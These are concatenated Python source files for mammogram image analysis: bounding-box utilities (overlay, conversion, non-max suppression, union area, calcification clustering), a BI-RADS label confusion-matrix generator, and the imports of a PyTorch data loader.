image = np.dstack([image] * 3)
for idx, (rects, label) in enumerate(zip(rects_list, label_list)):
if not rects:
continue
image = overlay_bbox_on_grayscale_image(image, rects, label=label, color=color, order=order, **kwargs)
return image
def create_mask_with_bbox_list(image, rects_list):
"""Create binary mask array with bbox list
This function fills the inside of a bbox.
It is different from overlay_bbox_list_on_image which only shows the edge of the bbox
Args:
image: numpy array of the canvas
rects_list: list of int in the order of (x, y, w, h)
"""
for x, y, w, h in rects_list:
# loop over the bboxes and draw a filled rectangle for each
# use thickness = -1 to fill the inside
cv2.rectangle(image, (x, y), (x + w, y + h), color=255, thickness=-1)
return image
def show_bbox(bbox_dict, raw_image_path_dict, image_pred_path_dict=None, n_demo=0, output_dir='', gt_only=False):
"""Overlay bbox coordinate to original image and show GT and pred side by side.
Prediction overlay uses prediction probability map if image_pred_path_dict is not None, otherwise use raw image
Args:
bbox_dict: a dict with image name as key. Each key corresponds to another dict with the following keys
'pred_bbox_list': input to is_bbox_list_overlapped()
'gt_bbox_list': input to is_bbox_list_overlapped()
'pred_box_correct': output of is_bbox_list_overlapped()
'gt_box_covered': output of is_bbox_list_overlapped()
raw_image_path_dict: a dict with image name as key. The corresponding value is the path to the raw image to
overlay
image_pred_path_dict: optional, a dict with image name as key. The corresponding value is the path to the pred
results to overlay. Default to None, and if specified, use it to showcase pred result on the RHS of the
stack image
n_demo: number of times to run demo
gt_only: boolean, whether to show gt only (no prediction) <TODO> Not tested yet
Returns:
None
"""
colors = {
"tp": (0, 255, 0), # green
"fp": (255, 0, 0), # blue in BGR
"fn": (0, 0, 255), # red in BGR
}
for idx, key in enumerate(bbox_dict.keys()):
if key.startswith('_'):
continue
pred_bbox_list = bbox_dict[key]['pred_bbox_list']
is_pred_bbox_correct_list = bbox_dict[key]['pred_box_correct']
gt_bbox_list = bbox_dict[key]['gt_bbox_list']
is_gt_bbox_covered_list = bbox_dict[key]['gt_box_covered']
bbox_list_tp = [bbox for bbox, bool in zip(pred_bbox_list, is_pred_bbox_correct_list) if bool]
bbox_list_fp = [bbox for bbox, bool in zip(pred_bbox_list, is_pred_bbox_correct_list) if not bool]
bbox_list_fn = [bbox for bbox, bool in zip(gt_bbox_list, is_gt_bbox_covered_list) if not bool]
bbox_list_tp_gt = [bbox for bbox, bool in zip(gt_bbox_list, is_gt_bbox_covered_list) if bool]
image_path = raw_image_path_dict[key]
image = fileio.load_image_to_array(image_path, np.uint8)
if image_pred_path_dict:
image_pred_path = image_pred_path_dict[key]
# this can be a list of up to 3 elements to populate BGR channels
if isinstance(image_pred_path, (list, tuple)) and len(image_pred_path) > 1:
image_overlay = np.dstack([image] * 3)
for idx_ch, single_pred_path in enumerate(image_pred_path):
logging.debug('assembling channel {}'.format(idx_ch))
image_pred = fileio.load_image_to_array(single_pred_path, np.uint8)
# generate overlay in green channel (low prob in magenta color)
logging.debug('before crop_or_pad {} {}'.format(image_pred.shape, image.shape))
image_pred = augmentation.crop_or_pad(image_pred, image.shape)
logging.debug('after crop_or_pad {} {}'.format(image_pred.shape, image.shape))
image_proba = np.where(image_pred > 0, image_pred, image) # as a single channel
image_overlay[:, :, idx_ch] = image_proba
image_pred = image_overlay
else:
image_pred = fileio.load_image_to_array(image_pred_path, np.uint8)
# generate overlay in green channel (low prob in magenta color)
logging.debug('before crop_or_pad {} {}'.format(image_pred.shape, image.shape))
image_pred = augmentation.crop_or_pad(image_pred, image.shape)
logging.debug('after crop_or_pad {} {}'.format(image_pred.shape, image.shape))
image_proba = np.where(image_pred > 0, image_pred, image) # as a single channel
image_overlay = np.dstack([image, image_proba, image])
image_pred = image_overlay
else:
image_pred = image
image_overlay_pred = overlay_bbox_list_on_image(image_pred, bbox_list_tp, color=colors['tp'])
image_overlay_pred = overlay_bbox_list_on_image(image_overlay_pred, bbox_list_fp, color=colors['fp'])
image_overlay_gt = overlay_bbox_list_on_image(image, bbox_list_tp_gt, color=colors['tp'])
image_overlay_gt = overlay_bbox_list_on_image(image_overlay_gt, bbox_list_fn, color=colors['fn'])
if idx < n_demo:
fig, ax = plt.subplots(1, 2, figsize=(16, 10))
ax = np.atleast_2d(ax)
ax[0, 0].imshow(image_overlay_gt)
ax[0, 1].imshow(image_overlay_pred)
plt.show()
# stack image and image_overlay side by side
# image_rgb = np.dstack([image] * 3)
logging.info('Processing key: {}'.format(key))
if output_dir:
if not gt_only:
image_stack = np.hstack([image_overlay_gt, image_overlay_pred])
else:
image_stack = image_overlay_gt
image_stack_path = os.path.join(output_dir, os.path.basename(image_path))
fileio.maybe_make_new_dir(output_dir)
cv2.imwrite(image_stack_path, image_stack)
else:
logging.warning('No output_dir specified. Skip key: {}'.format(key))
def convert_bbox_xywh_to_yminxmin(cv2_rects):
"""Convert cv2_rects (x, y, w, h) to bbox_coord (ymin, xmin, ymax, xman)
Args:
cv2_rects:
Returns:
bbox_coord
"""
x, y, w, h = cv2_rects
ymin, xmin, ymax, xmax = y, x, y + h, x + w
tf_bbox_coord = (ymin, xmin, ymax, xmax)
return tf_bbox_coord
def convert_bbox_yminxmin_to_xywh(tf_bbox_coord):
"""Convert tf_bbox_coord (ymin, xmin, ymax, xman) to cv2_rects (x, y, w, h)
Args:
tf_bbox_coord:
Returns:
cv2_rects
"""
ymin, xmin, ymax, xmax = tf_bbox_coord
y, x, h, w = ymin, xmin, ymax - ymin, xmax - xmin
cv2_rects = (x, y, w, h)
return cv2_rects
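# --- Illustrative sketch (not part of the original module) --------------------
# The two converters above are inverses of each other; a quick round trip with
# hypothetical values:
def _bbox_conversion_roundtrip_example():
    rects = (30, 20, 50, 40)                       # (x, y, w, h)
    bbox = convert_bbox_xywh_to_yminxmin(rects)    # -> (20, 30, 60, 80)
    return convert_bbox_yminxmin_to_xywh(bbox)     # -> (30, 20, 50, 40)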
def save_annotated_image(image, filename, label='', newdir=''):
""" Save image to newdir with the same basename in filename """
if newdir:
basename = os.path.basename(filename)
if label:
file, ext = os.path.splitext(basename)
basename = file + '_' + label + ext
newfilename = os.path.join(newdir, basename)
else:
newfilename = filename
dirname = os.path.dirname(newfilename)
fileio.maybe_make_new_dir(dirname)
# print(newfilename)
cv2.imwrite(newfilename, image)
def imshow_patch(image, rects, margin=200, origin='upper'):
"""
Show image patch of interest
Args:
image:
rects:
margin:
origin:
Returns:
image_patch: the cropped patch around the bbox (with margin applied)
"""
x, y, w, h = rects
height, width = image.shape[:2]
xmin, xmax = max(0, x-margin), min(x+w+margin, width)
ymin, ymax = max(0, y-margin), min(y+h+margin, height)
image_patch = image[ymin:ymax, xmin:xmax]
plt.gcf()
if len(image.shape) == 2:
plt.imshow(image, origin=origin, cmap='gray')
else:
plt.imshow(image, origin=origin)
plt.xlim((xmin, xmax))
if origin == 'upper':
ymin, ymax = ymax, ymin
plt.ylim((ymin, ymax))
return image_patch
def get_largest_bbox_coord_from_pixel_array(image_array, max_val=255, threshold=127, min_cnt_size=None):
"""
Convert binary bbox to bbox coordinates.
Note that this assumes that the script only gets the LARGEST connected component in image_array.
The use of this function should be DEPRECATED. For general purpose conversion, use
`get_bbox_coord_list_from_binary_array` instead.
Args:
image_array: input image (grayscale or binary) in the form of a numpy array
max_val: optional, default to 255 (8-bit)
threshold: optional, defaults to 127
min_cnt_size: if not None, assert contour size > min_cnt_size
Returns:
rects: bbox coordinates in the order of (x, y, w, h)
"""
# Get contours and return the largest
ret, thresh = cv2.threshold(image_array, threshold, max_val, 0)
image, contours, hierarchy = cv2.findContours(thresh, 1, 2)
cnt = max(contours, key=cv2.contourArea)
if min_cnt_size is not None:
assert cv2.contourArea(cnt) > min_cnt_size, 'max contour area is less than {} pixels'.format(min_cnt_size)
# Get coordinates for minimum circumscribing bounding box
rects = cv2.boundingRect(cnt)
return rects
def get_bbox_coord_list_from_binary_array(binary_array,
ignore_pred_under=0,
dilation_kernel_size=0,
bbox_dilation_ratio=1,
bbox_dilation_size=0):
"""Convert a binary array to a list of bbox coordinates in the order (ymin, xmin, ymax, xmax)
Connected component analysis with output = cv2.connectedComponentsWithStats():
Labels = output[1] is an array with the same shape as the input binary array, with each component
labeled with a different integer (BG is 0).
Stats = output[2] is a matrix of the stats that the function calculates. It has a length equal
to the number of labels and a width equal to the number of stats.
It can be used with the OpenCV documentation for it:
Statistics output for each label, including the background label, see below for available statistics.
Statistics are accessed via stats[label, COLUMN] where available columns are defined below.
cv2.CC_STAT_LEFT The leftmost (x) coordinate which is the inclusive start of the bounding box
in the horizontal direction.
cv2.CC_STAT_TOP The topmost (y) coordinate which is the inclusive start of the bounding box
in the vertical direction.
cv2.CC_STAT_WIDTH The horizontal size of the bounding box
cv2.CC_STAT_HEIGHT The vertical size of the bounding box
cv2.CC_STAT_AREA The total area (in pixels) of the connected component
Args:
binary_array: objects are marked with 1
ignore_pred_under: pixel count threshold below which to discard the predicted component
dilation_kernel_size: size of kernel to dilate the binary mask with
bbox_dilation_ratio: bbox_new = bbox * bbox_dilation_ratio + bbox_dilation_size
bbox_dilation_size: bbox_new = bbox * bbox_dilation_ratio + bbox_dilation_size
Returns:
bbox_coord_list:
area_list: a list of connected component areas
"""
assert binary_array.dtype == np.bool
binary_array = binary_array.astype(np.uint8)
# dilate binary mask to connect neighboring components
if dilation_kernel_size > 0:
kernel = np.ones((dilation_kernel_size, dilation_kernel_size), np.uint8)
binary_array = cv2.dilate(binary_array, kernel, iterations=1)
# connected component analysis
bbox_coord_list = []
area_list = []
output = cv2.connectedComponentsWithStats(binary_array)
stats = output[2]
for idx, stat in enumerate(stats):
# in the order of (x, y, w, h, area)
x, y, w, h, area = stat
# skip background component (always the first row)
if idx == 0:
if not (x == 0 and y == 0):
logging.warning(
'The background component did not start at top left corner but at x={}, y={}!'.format(x, y))
continue
if area < ignore_pred_under:
continue
# dilate bbox
x_center = x + w // 2
y_center = y + h // 2
w = w * bbox_dilation_ratio + 2 * bbox_dilation_size
h = h * bbox_dilation_ratio + 2 * bbox_dilation_size
x = x_center - w // 2
y = y_center - h // 2
ymin, xmin, ymax, xmax = y, x, y + h, x + w
# convert to integers
ymin, xmin, ymax, xmax = [int(item) for item in (ymin, xmin, ymax, xmax )]
bbox_coord_list.append((ymin, xmin, ymax, xmax))
area_list.append(area)
if area_list:
# sort by area_list in descending order, the largest bbox is bbox_coord_list[0]
area_list, bbox_coord_list = list(zip(*sorted(zip(area_list, bbox_coord_list), reverse=True)))
return bbox_coord_list, area_list
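# --- Illustrative sketch (not part of the original module) --------------------
# Minimal usage of get_bbox_coord_list_from_binary_array: a toy 20x20 boolean
# mask with two rectangular blobs. The larger blob comes first because the
# results are sorted by component area in descending order. np.bool mirrors the
# old-numpy convention already used by the assert in the function above.
def _bbox_from_binary_array_example():
    mask = np.zeros((20, 20), dtype=np.bool)
    mask[2:8, 3:12] = True      # blob 1: 6 x 9 = 54 px
    mask[12:15, 14:17] = True   # blob 2: 3 x 3 = 9 px
    bbox_list, area_list = get_bbox_coord_list_from_binary_array(mask)
    return bbox_list, area_list  # bbox_list[0] is the 54-px component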
def get_bbox_coord_for_largest_cc_in_binary_array(binary_array, **kwargs):
bbox = get_bbox_coord_list_from_binary_array(binary_array, **kwargs)[0][0]
return bbox
def get_largest_foreground_mask(image_array, background_value='auto'):
"""Find the largest foreground connected component
Connected component analysis with output = cv2.connectedComponentsWithStats():
Labels = output[1] is an array with the same shape as the input binary array, with each component
labeled with a different integer (BG is 0).
Args:
image_array: binary array where background is 0
Returns:
fg_mask_array: boolean numpy array. True for largest foreground connected component
"""
if background_value == 'auto':
# estimate the background from low percentiles (5th and 30th) of the image
lower_clip = np.percentile(image_array, 5)
upper_clip = np.percentile(image_array, 30)
if np.abs(upper_clip - lower_clip) / np.max(image_array) < 0.02:
background_value = upper_clip
else:
logging.warning('difference 5th and 30th percentile is {}\nManually inspect this image'.format(
np.abs(upper_clip - lower_clip)))
background_value = lower_clip
else:
assert isinstance(background_value, np.int)
binary_array = image_array > background_value
output = cv2.connectedComponentsWithStats(binary_array.astype(np.uint8))
stats = output[2]
if len(stats) > 1 :
# if there are at least two components returned
# find the idx of the largest fg component by area (excluding 0th row, i.e., the BG)
idx = np.argmax(stats[1:, -1]) + 1
fg_mask_array = (output[1] == idx)
else:
logging.debug('Only one component in the image. Check raw image!')
fg_mask_array = None
return fg_mask_array
def get_ar(bbox):
"""Get aspect ratio of bbox"""
ymin, xmin, ymax, xmax = bbox
width, height = xmax - xmin, ymax - ymin
ar = max(width, height) / min(width, height)
return ar
def large_ar_suppression(boxes, ar_threshold=2):
"""Filter out bbox with aspect ratio larger than ar_threshold"""
return [bbox for bbox in boxes if get_ar(bbox) <= ar_threshold]
def get_minmax_size(bbox):
"""Get aspect ratio of bbox"""
ymin, xmin, ymax, xmax = bbox
width, height = xmax - xmin, ymax - ymin
min_size = min(width, height)
max_size = max(width, height)
return min_size, max_size
def non_max_suppression_fast(boxes, threshold=0.5, option='union', max_iterations=1):
""" NMS to combine bboxes
Adapted from https://www.pyimagesearch.com/2015/02/16/faster-non-maximum-suppression-python/
Args:
boxes: in the order of (ymin, xmin, ymax, xmax)
threshold: overlap ratio above which two boxes are merged
option: method to postprocess the bbox coordinates
    'union': find the bbox for the union of the overlapping boxes
    'original': find the original bbox, from right to left
max_iterations: maximum number of merging passes to run
Returns:
    merged_boxes: array of merged bbox coordinates
    merged_boxes_sources: list of lists with the indices of the original boxes merged into each output box
"""
def concate_list(arrays, concateidx):
"""method to help track the resource of combined bounding boxes
Args:
arrays: list of list, represent the indices
concateidx: indices of list to be merged
Returns: merged flat list
"""
result = []
for idx in concateidx:
result.extend(arrays[idx])
return result
merged_boxes_sources = [[i] for i in list(range(len(boxes)))]
for i_iter in range(max_iterations):
num_bbox_before_nms = len(boxes)
# if there are no boxes, return an empty list
if num_bbox_before_nms == 0:
return [], []
# if the bounding boxes are integers, convert them to floats --
# this is important since we'll be doing a bunch of divisions
boxes = np.array(boxes).astype("float")
# grab the coordinates of the bounding boxes
# x1, y1 == xmin, ymin
# x2, y2 == xmax, ymax
y1 = boxes[:, 0]
x1 = boxes[:, 1]
y2 = boxes[:, 2]
x2 = boxes[:, 3]
# compute the area of the bounding boxes and sort the bounding
# boxes by the bottom-right y-coordinate of the bounding box
area = (x2 - x1 + 1) * (y2 - y1 + 1)
idxs = np.argsort(y2)
merged_boxes = []
new_merged_boxes_sources = []
# keep looping while some indexes still remain in the indexes list
while len(idxs) > 0:
# grab the last index in the indexes list and add the
# index value to the list of picked indexes
last = len(idxs) - 1
i = idxs[last]
# find the largest (x, y) coordinates for the start of
# the bounding box and the smallest (x, y) coordinates
# for the end of the bounding box
xx1 = np.maximum(x1[i], x1[idxs[:last]])
yy1 = np.maximum(y1[i], y1[idxs[:last]])
xx2 = np.minimum(x2[i], x2[idxs[:last]])
yy2 = np.minimum(y2[i], y2[idxs[:last]])
# compute the width and height of the bounding box
w = np.maximum(0, xx2 - xx1 + 1)
h = np.maximum(0, yy2 - yy1 + 1)
# compute the ratio of overlap
# NB. use the area of the moving box as overlap denominator
# <TODO> add union area calculation
overlap = (w * h) / area[idxs[:last]]
# delete all indexes from the index list
idxs_idx_to_delete = np.concatenate(([last],
np.where(overlap > threshold)[0]))
if option == 'union':
# return the bbox of the union
xx1 = np.min(x1[idxs[idxs_idx_to_delete]])
yy1 = np.min(y1[idxs[idxs_idx_to_delete]])
xx2 = np.max(x2[idxs[idxs_idx_to_delete]])
yy2 = np.max(y2[idxs[idxs_idx_to_delete]])
merged_boxes.append((yy1, xx1, yy2, xx2))
# merged_boxes_sources.append(idxs[idxs_idx_to_delete])
new_merged_boxes_sources.append(concate_list(merged_boxes_sources, idxs[idxs_idx_to_delete]))
elif option == 'original':
merged_boxes.append(boxes[i])
merged_boxes_sources.append(i)
else:
raise ValueError('Unsupported option {}'.format(option))
idxs = np.delete(idxs, idxs_idx_to_delete)
merged_boxes = np.array(merged_boxes).astype(np.int)
# the original bbox coord
boxes = merged_boxes
merged_boxes_sources = new_merged_boxes_sources
num_bbox_after_nms = len(boxes)
# no bbox has been merged in this iteration
if num_bbox_before_nms == num_bbox_after_nms:
logging.debug('Finish NMS at {} out of {} requested iterations'.format(i_iter + 1, max_iterations))
return boxes, merged_boxes_sources
return boxes, merged_boxes_sources
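# --- Illustrative sketch (not part of the original module) --------------------
# Minimal usage of non_max_suppression_fast with option='union': two heavily
# overlapping boxes plus one isolated box. The overlapping pair is merged into
# its bounding union and merged_sources records which inputs went into each
# output box. Box values are hypothetical.
def _nms_example():
    boxes = [
        (0, 0, 10, 10),     # (ymin, xmin, ymax, xmax)
        (1, 1, 11, 11),     # overlaps the first box heavily
        (50, 50, 60, 60),   # isolated
    ]
    merged_boxes, merged_sources = non_max_suppression_fast(boxes, threshold=0.5, option='union')
    return merged_boxes, merged_sources   # two boxes remain after merging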
def calculate_union_area(boxes):
""" calculate the union area of several bounding boxes
Args:
boxes: list of bounding boxes, each one in the order of (ymin, xmin, ymax, xmax)
Returns: union area
"""
# convert to np array if the input is a list
boxes = np.array(boxes)
width = max(boxes[:, 3])
height = max(boxes[:, 2])
canvas = np.zeros([width + 1, height + 1])
for i in range(len(boxes)):
canvas[boxes[i, 1]:boxes[i, 3] + 1, boxes[i, 0]:boxes[i, 2] + 1] = 1
return np.sum(canvas)
def _get_valid_length(line_scan):
"""Helper function for calculating valid length in one line_scan.
Used in calculate_union_area_v2
"""
sum_length = 0
acc = 0
last_x = 0
for current_x in sorted(line_scan):
if acc > 0:
sum_length += current_x - last_x
acc += line_scan[current_x]
last_x = current_x
return sum_length
def calculate_union_area_v2(boxes):
"""Calculate the union area of several bounding boxes
This algorithm is inspired by numerical integration.
Scan a line through the whole image. Calculate the 'valid length (height)'
of each scanning position, and the intervals (width) during which the
'valid length' stays the same.
Args:
boxes: list of bounding boxes, each one in the order of (ymin, xmin, ymax, xmax)
Returns: union area
"""
# convert to np array if the input is a list
boxes = np.array(boxes)
START = 1
END = -START
# key: y coordinate of a 'changing line' (a row where the set of active boxes changes)
# value: list of tuples (x coordinate, status), where status marks the start/end of a box
boundary = {}
for box in boxes:
y0, x0, y1, x1 = box
if y0 not in boundary:
boundary[y0] = []
if y1 + 1 not in boundary:
boundary[y1 + 1] = []
# starting and ending of a bounding box are 'changing lines'
# since in our case, area means number of pixels
# and [x0,x1],[y0,y1] are inclusive,
# so '+1' is needed for x1 and y1
# in line y0, a meeting starts at x0 and ends at x1
boundary[y0].append((x0, START))
boundary[y0].append((x1 + 1, END))
# in line y1 + 1, there will be no more meeting
# the effect needs to be negated
boundary[y1 + 1].append((x0, END))
boundary[y1 + 1].append((x1 + 1, START))
# valid length in each line is equivalent to
# 'meeting scheduling' interview problem.
# previous line's y value with a changing line scan
# first value does not matter
# as long as valid_length is set to 0 at first
last_y = -1
valid_length = 0
area_sum = 0
# one line scan over the 2d space.
# key is x
# value is summation of status(1/-1)
# 1 means beginning of bounding box
# -1 means ending of bounding box
# changes over y
line_scan = {}
for current_y in sorted(boundary):
# valid length stay the same for [last_y, current_y]
area_sum += (current_y - last_y) * valid_length
last_y = current_y
# update the status of line scan
for pair in boundary[current_y]:
x = pair[0]
status = pair[1]
line_scan[x] = line_scan.get(x, 0) + status
if not line_scan[x]:
del line_scan[x]
valid_length = _get_valid_length(line_scan)
return area_sum
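# --- Illustrative sketch (not part of the original module) --------------------
# Worked example for the sweep-line union area above: two boxes of 6x6 = 36 px
# each (coordinates are inclusive) overlapping in a 3x3 corner, so the union is
# 36 + 36 - 9 = 63. The rasterised calculate_union_area() agrees.
def _union_area_example():
    boxes = [(0, 0, 5, 5), (3, 3, 8, 8)]   # (ymin, xmin, ymax, xmax), inclusive
    return calculate_union_area(boxes), calculate_union_area_v2(boxes)   # -> (63.0, 63)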
def calc_cluster(bboxes, threshold=0, max_iterations=100):
"""Calculate clusters given a list of bbox coordinates. Return
Args:
threshold: merging overlap. Defaults to 0, meaning that if two bbox are merged if they touch
max_iterations: this should be set to a sufficiently high number to ensure merged cluster is clean
bboxes: list of bounding boxes, each one in the order of (ymin, xmin, ymax, xmax)
and represents a single calcification
Returns:
merged_source_list: list of list of bbox idx (corresponding to the input list)
union_area_list: list of areas of each merged cluster
count_list: list of counts in each merged cluster
density_list: list of number density
"""
# TODO select better nms parameters
bboxes = np.array(bboxes)
merged_bbox_list, merged_source_list = non_max_suppression_fast(bboxes, threshold=threshold, max_iterations=max_iterations)
union_area_list = []
count_list = []
density_list = []
for merged_idxs in merged_source_list:
union_area = calculate_union_area(bboxes[merged_idxs])
union_area_list.append(union_area)
for idx in range(len(merged_source_list)):
count = len(merged_source_list[idx])
density = count / union_area_list[idx]
count_list.append(count)
density_list.append(density)
return merged_bbox_list, merged_source_list, union_area_list, count_list, density_list
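# --- Illustrative sketch (not part of the original module) --------------------
# Minimal usage of calc_cluster: three mutually touching boxes collapse into a
# single cluster of count 3, while the far-away box stays a singleton. Box
# values are hypothetical.
def _calc_cluster_example():
    bboxes = [
        (0, 0, 4, 4),
        (3, 3, 7, 7),
        (6, 6, 10, 10),
        (100, 100, 104, 104),
    ]
    _, merged_source_list, _, count_list, _ = calc_cluster(bboxes, threshold=0, max_iterations=10)
    return sorted(count_list)   # -> [1, 3]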
def bbox_list_intersect(bbox_list_list, threshold=0.1):
"""
Args:
bbox_list_list: a list of bbox_list. Each bbox_list comes form one source, so len(bbox_list_list) is the
number of sources
Returns:
"""
# print(bbox_list_list)
flat_bbox_list = [x for xx in bbox_list_list for x in xx]
bbox_list, source_list = non_max_suppression_fast(flat_bbox_list, threshold=threshold)
# print(source_list)
class_len_list = [len(bbox_list) for bbox_list in bbox_list_list]
def map_index_to_source_class(index, class_len_list):
"""Convert an index in a concatenated list to the list index
For example, index 5 in a concatenated list from 3 lists with length [3, 1, 4] belongs to the
third list, thus returns 2.
"""
cumsum_list = np.cumsum(class_len_list)
assert index < np.max(cumsum_list) and index >= 0, 'index is {}'.format(index)
return min(np.argwhere([index < cumsum for cumsum in np.cumsum(class_len_list)]))[0]
source_list = [[map_index_to_source_class(x, class_len_list) for x in xx] for xx in source_list]
# print(source_list)
bbox_list_intersected = []
for bbox_coord, source in zip(bbox_list, source_list):
if len(set(source)) == len(class_len_list):
bbox_list_intersected.append(bbox_coord)
# print(bbox_list_intersected)
return bbox_list_intersected
def combine_mask_images(mask_search_path1, mask_search_path2, mask_output_dir, method='intersection'):
"""Read in masks, find intersection or union of annotation and write out to file
Notes: This function currently only supports two sources. To extend to multiple sources:
1. Change argument to a list of search paths
2. Call PairedDictGenerator recursively
Args:
mask_search_path1:
mask_search_path2:
mask_output_dir:
method: 'intersection' or 'union'
"""
assert method in ['intersection', 'union']
join = 'inner' if method == 'intersection' else 'outer'
generator = patch.PairedDictGenerator(mask_search_path1, mask_search_path2, output_dir=mask_output_dir,
mask_suffix='.png', image_suffix='.png')
paired_dict = generator.get_paired_image_and_mask(key_names=('mask1', 'mask2'), join=join)
keys = sorted(paired_dict.keys())
for key in tqdm(keys[:]):
# read in mask arrays
mask_array_list = []
for dataset in paired_dict[key].keys():
mask_path = paired_dict[key][dataset]
if os.path.isfile((mask_path)):
mask_array = plt.imread(mask_path, -1)
else:
continue
mask_array_list.append(mask_array)
assert mask_array_list, 'no mask found for key {}'.format(key)
# generate union mask
canvas = None
for mask_array in mask_array_list:
try:
if method == 'intersection':
canvas *= mask_array.astype(np.bool)
else:
canvas += mask_array.astype(np.bool)
except:
canvas = mask_array.astype(np.bool)
# write generated mask to file
mask_output_path = os.path.join(mask_output_dir, '{}_{}.png'.format(key, method))
cv2.imwrite(mask_output_path, (canvas * 255).astype(np.uint8))
def clip_to_boundary(bbox, canvas_shape):
"""Clip bbox coordinates to canvas shape
Args:
bbox:
canvas_shape:
Returns:
"""
ymin, xmin, ymax, xmax = bbox
assert len(canvas_shape) == 2, 'canvas shape {} is not 2D!'.format(canvas_shape)
height, width = canvas_shape
# crop to boundary
ymin = max(ymin, 0)
xmin = max(xmin, 0)
ymax = min(ymax, height)
xmax = min(xmax, width)
assert ymax - ymin > 1 and xmax - xmin > 1, 'Bbox too small, invalid crop!'
bbox = (ymin, xmin, ymax, xmax)
return bbox
def crop_by_bbox(image_array, bbox):
"""
Args:
image_array: 2d or 3d array
bbox: in the order of (ymin, xmin, ymax, xmax)
Returns:
"""
canvas_shape = image_array.shape[:2]
bbox = clip_to_boundary(bbox, canvas_shape=canvas_shape)
ymin, xmin, ymax, xmax = bbox
image_array = image_array[ymin:ymax, xmin:xmax, ...]
return image_array
def poly_approx(contours, approx_tol=0.01):
"""Approximate contours with polygon
Args:
contours:
approx_tol:
Returns:
"""
poly_contours = []
for c in contours:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, approx_tol * peri, True)
poly_contours.append(approx)
return poly_contours
def is_point_inside_contour(point, contour):
"""Tell if a point is inside a contour
Args:
point: in the order of (x, y) per cv2
contour:
Returns:
"""
is_inside = cv2.pointPolygonTest(contour, point, measureDist=False) > 0
return is_inside
def fill_holes(image, thresh=0.001):
"""Fill holes in a binary image
Args:
image:
thresh:
Returns:
"""
from skimage.morphology import reconstruction
seed = np.copy(image)
seed[1:-1, 1:-1] = image.max()
mask = image
filled = reconstruction(seed, mask, method='erosion')
# filled = (filled > thresh).astype(np.uint8)
return filled
<file_sep>import os
import pandas as pd
import itertools
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
class ConfusionMatrixGenerater(object):
def __init__(self, image_data, csvfile):
self.image_data = image_data
self.csvfile = csvfile
self.df = pd.read_csv(csvfile)
self.biradsmap = {0.0: "bi-rads0", 1.0:"bi-rads1", 2.0:"bi-rads2", 3.0:"bi-rads3", 4.0:"bi-rads4",
4.1: "bi-rads4a", 4.2:"bi-rads4b", 4.3:"bi-rads4c", 5.0:"bi-rads5"}
def gen_dict_from_csv(self):
"""
create a dictionary that stores ziwei's birads label
key: image name "pid-laterality", e.g. 111-L
value: birads-num as csv file showed
choose the highest birads to store
"""
ziwei_birads = {}
for i in range(len(self.df["index"])):
patient_idx = self.df["index"][i].split("-")[0]
# laterality_idx = df["index"][i].split("-")[1]
if self.df["index"][i].split("-")[1] == str(1) or self.df["index"][i].split("-")[1] == str(3):
laterality = "R"
elif self.df["index"][i].split("-")[1] == str(2) or self.df["index"][i].split("-")[1] == str(4):
laterality = "L"
else:
print("wrong laterality ", self.df["index"][i])
image_idx = patient_idx + "-" + laterality
if image_idx not in ziwei_birads.keys():
ziwei_birads[image_idx] = float(self.df["birads_num"][i])
else:
if ziwei_birads[image_idx] < float(self.df["birads_num"][i]):
ziwei_birads[image_idx] = float(self.df["birads_num"][i])
"""
convert the num to real birads class, like bi-rads2, etc
"""
ziwei_birads_new = {}
for patient in ziwei_birads:
ziwei_birads_new[patient] = self.biradsmap[ziwei_birads[patient]]
return ziwei_birads_new
def gen_dict_from_txt(self):
"""
create a dictionary that stores the original comments.txt file info
key: image name "pid-laterality", e.g. 111-L
value: birads
"""
image_comment = {}
for patient in os.listdir(self.image_data):
if os.path.isdir(os.path.join(self.image_data, patient)):
comment_path = os.path.join(self.image_data, patient, "comments.txt")
# print(comment_path)
with open(comment_path, "r", encoding='utf-8') as f:
info = f.readlines()
for i in range(len(info)):
if "left" in info[i].lower():
left_birads = info[i].split(":")[-1].lower().replace(" ", "").replace("\n","")
image_comment[patient+"-L"] = left_birads
if "right" in info[i].lower():
right_birads = info[i].split(":")[-1].lower().replace(" ", "").replace("\n","")
image_comment[patient+"-R"] = right_birads
return image_comment
def gen_confusion_matrix(self, class_names):
csv_dict = self.gen_dict_from_csv()
txt_dict = self.gen_dict_from_txt()
ziwei_list = []
img_comment_list = []
# wrong_list = []
count = 0
for img in csv_dict.keys():
if img in txt_dict.keys():
count += 1
ziwei_list.append(csv_dict[img])
img_comment_list.append(txt_dict[img])
cnf_matrix = confusion_matrix(img_comment_list, ziwei_list, labels=class_names)
np.set_printoptions(precision=2)
return cnf_matrix
@staticmethod
def plot_confusion_matrix(cm, classes, xlabel, ylabel,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
Plot the confusion matrix with matplotlib.
If `normalize` is True, each row of `cm` is normalized to sum to 1.
"""
plt.figure()
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel(ylabel)
plt.xlabel(xlabel)
plt.show()
if __name__ == "__main__":
img_data = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/ChinaLQ_Display_1"
csvfile = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/china_bbox.csv"
class_names = ["bi-rads0", "bi-rads1", "bi-rads2", "bi-rads3", "bi-rads4", "bi-rads4a", "bi-rads4b",
"bi-rads4c", "bi-rads5"]
cmg = ConfusionMatrixGenerater(img_data, csvfile)
cnf_matrix = cmg.gen_confusion_matrix(class_names)
cmg.plot_confusion_matrix(cnf_matrix, class_names, "ziwei", "hospital")
<file_sep>'''
data generator for the global local net
v0: for resnet34 only
v1: for global local with only local path, prepare the data for the input['local']
'''
import torch
from torch.utils.data import Dataset, DataLoader
import torchvision
from torchvision import transforms, utils
import pandas as pd
import random
import os
import math
# from skimage import io, transform
import numpy as np
import cv2
from time import time
from PIL import Image
import matplotlib.pyplot as plt
import scipy.io as sio
import imgaug as ia
